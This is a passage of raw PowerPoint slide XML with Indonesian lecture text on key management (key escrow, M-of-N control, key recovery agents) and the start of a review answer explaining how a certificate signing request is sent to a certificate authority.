              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> escrow dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> M of N. Escrow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengarsipan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. M of N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuorum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (M) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang-orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (N) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setuju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengesahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipecah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> escrow yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di escrow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (KRA). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> KRA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengesahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> KRA yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meniru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123858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1. How does a subject go about obtaining a certificate from a CA?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>Certificate Signing Request (CSR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> public key dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (nama, domain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). CSR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>Certificate Authority (CA)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
